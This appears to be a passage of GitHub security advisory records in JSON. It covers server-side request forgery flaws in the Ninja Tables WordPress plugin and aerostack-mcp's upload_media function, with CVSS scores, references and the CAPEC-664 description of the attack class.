},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37@%3Cbugs.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37%40%3Cbugs.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RX3P-3V8J-HGW8
Vulnerability from github – Published: 2024-06-03 12:30 – Updated: 2024-06-03 12:30Server-Side Request Forgery (SSRF) vulnerability in WPManageNinja LLC Ninja Tables.This issue affects Ninja Tables: from n/a through 5.0.9.
{
"affected": [],
"aliases": [
"CVE-2024-35635"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-03T10:15:14Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in WPManageNinja LLC Ninja Tables.This issue affects Ninja Tables: from n/a through 5.0.9.",
"id": "GHSA-rx3p-3v8j-hgw8",
"modified": "2024-06-03T12:30:38Z",
"published": "2024-06-03T12:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35635"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/ninja-tables/wordpress-ninja-tables-plugin-5-0-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RX6V-R244-H59W
Vulnerability from github – Published: 2026-07-09 18:31 – Updated: 2026-07-09 18:31A security vulnerability has been detected in aerostackdev aerostack-mcp up to 6315dfde7df0a15aaf743f88d91347115e09ba23. Affected by this issue is the function upload_media of the component mcp-whatsapp. Such manipulation of the argument media_url leads to server-side request forgery. The attack may be launched remotely. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-15189"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-09T16:16:38Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been detected in aerostackdev aerostack-mcp up to 6315dfde7df0a15aaf743f88d91347115e09ba23. Affected by this issue is the function upload_media of the component mcp-whatsapp. Such manipulation of the argument media_url leads to server-side request forgery. The attack may be launched remotely. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-rx6v-r244-h59w",
"modified": "2026-07-09T18:31:51Z",
"published": "2026-07-09T18:31:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15189"
},
{
"type": "WEB",
"url": "https://github.com/aerostackdev/aerostack-mcp/issues/3"
},
{
"type": "WEB",
"url": "https://github.com/aerostackdev/aerostack-mcp"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-15189"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/851437"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377115"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377115/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.